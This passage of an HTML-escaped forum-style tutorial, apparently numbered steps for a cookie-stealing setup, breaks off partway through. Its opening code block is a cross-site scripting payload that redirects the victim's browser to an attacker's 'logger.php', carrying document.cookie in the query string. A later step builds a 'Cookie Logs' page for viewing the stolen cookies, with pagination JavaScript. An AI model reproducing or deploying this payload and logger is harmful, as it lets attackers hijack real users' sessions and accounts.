border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #66ccff;"&gt;location&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;href&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'http://youwebsite.com/logger.php?cookie='&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;encodeURIComponent&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;cookie&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: goldenrod; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;3 ) Cookie Logs page&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: dodgerblue; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[*]Make a blank logs.html page&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: darkgreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[*] ( logs.php )&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;!--&amp;nbsp;If&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;you&amp;nbsp;wanna&amp;nbsp;highlight&amp;nbsp;a&amp;nbsp;specific&amp;nbsp;words&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;--&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;script&amp;nbsp;type&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"text/javascript"&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;src&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"highlight.js"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&amp;lt;body&amp;nbsp;onload="highlightSearchTerms('Word1');highlightSearchTerms('Word2');highlightSearchTerms​('Word3')"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;style&amp;nbsp;type="text/css"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;body&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;br /&gt;&amp;nbsp;overflow:visible;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;.pg-normal&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;color:&amp;nbsp;black;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;font-weight:&amp;nbsp;normal;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;text-decoration:&amp;nbsp;none;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cursor:&amp;nbsp;pointer;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;.pg-selected&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;color:&amp;nbsp;black;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;font-weight:&amp;nbsp;bold;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;text-decoration:&amp;nbsp;underline;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cursor:&amp;nbsp;pointer;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;/style&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;script&amp;nbsp;type="text/javascript"&amp;nbsp;src="page.js"&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;center&amp;gt;&amp;lt;div&amp;nbsp;id="pageNavPosition"&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt;&amp;lt;hr&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;form&amp;nbsp;action=""&amp;nbsp;method="get"&amp;nbsp;enctype="application/x-www-form-urlencoded"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;table&amp;nbsp;&amp;nbsp;id="results"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;tr&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;th&amp;gt;&amp;lt;/th&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;th&amp;gt;&amp;lt;/th&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/tr&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #66ccff;"&gt;&amp;lt;?php&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;include&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'logs.html'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;?&amp;gt;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&amp;lt;/table&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/form&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;script&amp;nbsp;type="text/javascript"&amp;gt;&amp;lt;!--&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;pager&amp;nbsp;=&amp;nbsp;new&amp;nbsp;Pager('results',&amp;nbsp;10);&lt;br /&gt;&amp;nbsp;&amp;nbsp;pager.init();&lt;br /&gt;&amp;nbsp;&amp;nbsp;pager.showPageNav('pager',&amp;nbsp;'pageNavPosition');&lt;br /&gt;&amp;nbsp;&amp;nbsp;pager.showPage(1);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&amp;nbsp;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: dodgerblue; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[*]page.js [for pagination ]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #7ac07c;"&gt;function&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;Pager&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;tableName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;tableName&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;tableName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pages&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;inited&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;false&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showRecords&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;from&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;to&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;getElementById&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;tableName&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;).&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;i&amp;nbsp;starts&amp;nbsp;from&amp;nbsp;1&amp;nbsp;to&amp;nbsp;skip&amp;nbsp;table&amp;nbsp;header&amp;nbsp;row&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;for&amp;nbsp;(var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;++)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;from&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;||&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;to&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;].&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;style&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;display&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'none'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;rows&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;].&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;style&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;display&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;''&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pageNumber&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(!&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;inited&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;alert&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"not&amp;nbsp;inited"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;return;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;oldPageAnchor&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;getElementById&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'pg'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;oldPageAnchor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;className&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'pg-normal'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pageNumber&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newPageAnchor&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;getElementById&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'pg'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;newPageAnchor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;className&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'pg-selected'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;from&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;pageNumber&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;*&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;to&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;from&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;itemsPerPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showRecords&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;from&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;to&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;prev&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function()&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;showPage&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;currentPage&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;1&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;next&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;function()&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;this&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: 